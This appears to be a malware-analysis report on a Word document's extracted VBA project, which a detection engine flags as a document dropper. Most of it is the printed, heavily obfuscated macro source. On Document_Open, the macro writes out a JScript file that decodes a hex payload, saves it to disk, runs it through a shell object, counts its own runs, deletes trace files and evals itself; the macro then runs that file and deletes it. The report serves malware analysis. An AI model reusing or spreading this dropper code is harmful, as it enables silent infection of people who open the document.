ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var dacbeeeabccfooo = new ActiveXObject(eebbbbdedaed(" & Chr(34) & ")ALA)TLu)F)DLuLYL)TYLLLuLHLd)A)u)A)DLdL*LILTLnLdLA)D" & Chr(34) & ",1));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var dcedcdd = [];")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("for(var ffcfffda=0; ffcfffda< dbbababedbbadebfa.length-1; ffcfffda+=2){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("dcedcdd.push(parseInt(dbbababedbbadebfa.substr(ffcfffda, 2), 16));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("befeffcad = String.fromCharCode.apply(String, dcedcdd);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("function ffaccda(deababeefe){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var edcdfdcdbadc = deababeefe;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var cfbeefdebfdcf = new ActiveXObject(eebbbbdedaed('---+D8DDDIDDDTTYdA)D)TLdL8L*',1));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("cfbeefdebfdcf.Type = 2;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("cfbeefdebfdcf.Charset = 'ISO-8859-1';")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("cfbeefdebfdcf.Open();")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("cfbeefdebfdcf.WriteText(edcdfdcdbadc);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("cfbeefdebfdcf.SaveToFile(afedbbdecbccad + '/' +eebbbbdedaed('---+AdAuALAdTYLd)!Ld',1), 2);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("cfbeefdebfdcf.Close();")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("ffaccda(befeffcad);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var dacbeeeabccf = new ActiveXObject(eebbbbdedaed(" & Chr(34) & ")ALA)TLu)F)DLuLYL)TYLLLuLHLd)A)u)A)DLdL*LILTLnLdLA)D" & Chr(34) & ",1));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var efccebba = dacbeeeabccf.FileExists(afedbbdecbcca + '/' +'ebbabcbefeb.txt');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var eecedccaddde = new ActiveXObject(eebbbbdedaed('---+d)dALA)TLu)F)DTY)AL!LdLHLH',1));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("eecedccaddde.Run(eebbbbdedaed('---+LAL*LDTYLd)!LdTFTILATF',1)+ afedbbdecbccad +'\\'+ eebbbbdedaed('---+AdAuALAdTYLd)!Ld',1),0,false);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("dacbeeeabccf.DeleteFile(afedbbdecbcca + '/' +'ecaafbcbfdafer.txt');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(efccebba)dacbeeeabccf.DeleteFile(afedbbdecbcca + '/' +'ebbabcbefeb.txt');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("WScript.Quit();")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("*/")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("function dcabeedebbfabbc(eceaffacddd){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var bceebccebdcbc = new ActiveXObject('Scripting.FileSystemObject');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var efdddeacacfbcbb = eceaffacddd;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var caeeabb = bceebccebdcbc.OpenTextFile(efdddeacacfbcbb, 1);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var dfdabaeafabeaa = caeeabb.ReadAll();")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("caeeabb.Close();")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("return dfdabaeafabeaa;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var ecaafbcbfdaf = 0;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var efccebba = aeeebbddccfa.FileExists(afedbbdecbcca + '/' + 'ecaafbcbfdafer.txt');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(efccebba == true){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var fdeaedddb = aeeebbddccfa.OpenTextFile(afedbbdecbcca + '/' + 'ecaafbcbfdafer.txt', 1,1);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("ecaafbcbfdaf = fdeaedddb.ReadAll();")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("fdeaedddb.Close();")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("ecaafbcbfdaf = parseInt(ecaafbcbfdaf) +1;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("fdeaedddb = aeeebbddccfa.OpenTextFile(afedbbdecbcca + '/' + 'ecaafbcbfdafer.txt', 2,1);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("fdeaedddb.WriteLine(ecaafbcbfdaf);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("fdeaedddb.Close();")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var ffceceabafdbeb = dcabeedebbfabbc(WScript.ScriptFullName);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(ecaafbcbfdaf==4){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("fdeaedddb = aeeebbddccfa.OpenTextFile(afedbbdecbcca + '/' + 'cebcefeefcbedcb.txt', 2,1);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("fdeaedddb.WriteLine(ecaafbcbfdaf);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("fdeaedddb.Close();")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(ecaafbcbfdaf==5){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(aeeebbddccfa.FileExists(afedbbdecbcca + '/' + 'dffbeeeddfcae.jpg'))aeeebbddccfa.DeleteFile(afedbbdecbcca + '/' + 'dffbeeeddfcae.jpg');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("aeeebbddccfa.MoveFile(afedbbdecbcca + '/' + 'cebcefeefcbedcb.txt', afedbbdecbcca + '/' + 'ebbabcbefeb.txt');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(aeeebbddccfa.FileExists(afedbbdecbcca + '/' + 'eedeeacabb.txt'))aeeebbddccfa.DeleteFile(afedbbdecbcca + '/' + 'eedeeacabb.txt');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(aeeebbddccfa.FileExists('efddfbdcdfafb.txt'))aeeebbddccfa.DeleteFile(afedbbdecbcca + '/' + 'efddfbdcdfafb.txt');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(aeeebbddccfa.FileExists(afedbbdecbcca + '/' + '2eedeeacabb.txt'))aeeebbddccfa.DeleteFile(afedbbdecbcca + '/' + '2eedeeacabb.txt');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(aeeebbddccfa.FileExists(afedbbdecbcca + '/' + '2eedeeacabb.txt'))aeeebbddccfa.DeleteFile(afedbbdecbcca + '/' + '2eedeeacabb.txt');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(aeeebbddccfa.FileExists(afedbbdecbcca + '/' + '2eedeeacabb12.txt'))aeeebbddccfa.DeleteFile(afedbbdecbcca + '/' + '2eedeeacabb12.txt');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("ffceceabafdbeb = ffceceabafdbeb.split('---+').join('').replace('/*','').replace('*/', '').replace('\/\/','');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var efccebba = aeeebbddccfa.FileExists(afedbbdecbcca + '/' + 'ebbabcbefeb.txt');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(efccebba == true){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("eval(ffceceabafdbeb);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("eval(ffceceabafdbeb);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.Close
End Function
Private Sub Document_Open()
Call deceecffacbcfcecdeccaecaecdaeffdbecedbfebebafa_adafaccfaadacbaf_aedfcfaddcaaaebdfbeedfecffedccaedbbbcaddfedddfcbadbfcfdeae
Call adbfccafefaeffdcdaddecacaeddfce_dfadecfeeb_defdccecddabbfadbfcedbadecadddbcfecdafadcadbeacbcae
Set beaabddedeefffbeaefafdbffbbefffcfabc_bbeafadbafbaeff_bcffcefbcbbcbecccbfdeecfdbbfacdaddfddbbacfdeaca = VBA.CreateObject(beafdacfeccefcfdabcbcbafbdffadfefeaebe_ffcedacefdda_afbcbafadffaedaedeaaceffecefdefdabaaeaede())
Dim eaafadfcadabbafaaacfbecdfdfdbabaa_eccbbce_dddbbcfbafabbaedeaabdafbaccebbfcecbcccdbdeccbeeebddf As Boolean: eaafadfcadabbafaaacfbecdfdfdbabaa_eccbbce_dddbbcfbafabbaedeaabdafbaccebbfcecbcccdbdeccbeeebddf = True
Dim becabddecceffcadabbeddddfabbbabeb_fcdfbfc_ecdccfdbbdebceafedfaabdbeeeedccfaeadacdafdfffdfed As Integer: becabddecceffcadabbeddddfabbbabeb_fcdfbfc_ecdccfdbbdebceafedfaabdbeeeedccfaeadacdafdfffdfed = 1
beaabddedeefffbeaefafdbffbbefffcfabc_bbeafadbafbaeff_bcffcefbcbbcbecccbfdeecfdbbfacdaddfddbbacfdeaca.Run CStr(eacffadeebccfebfceedbbaaafabacfceda_dcecedabbcbfaaa_ddaaefcacbdfbdebcfdfbeccececcafdcb()), becabddecceffcadabbeddddfabbbabeb_fcdfbfc_ecdccfdbbdebceafedfaabdbeeeedccfaeadacdafdfffdfed, eaafadfcadabbafaaacfbecdfdfdbabaa_eccbbce_dddbbcfbafabbaedeaabdafbaccebbfcecbcccdbdeccbeeebddf
Kill CStr(eacffadeebccfebfceedbbaaafabacfceda_dcecedabbcbfaaa_ddaaefcacbdfbdebcfdfbeccececcafdcb())
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 32768 bytes |
SHA-256: 41acd3582afe483be6a637ffbacb961b3c355c9df70b61194254e32250a878c0 |
|||
|
Detection
ClamAV:
Doc.Dropper.Agent-6325104-0
Obfuscation or payload:
likely
Carved artifact contains 5 eval/decoder/string-building token(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.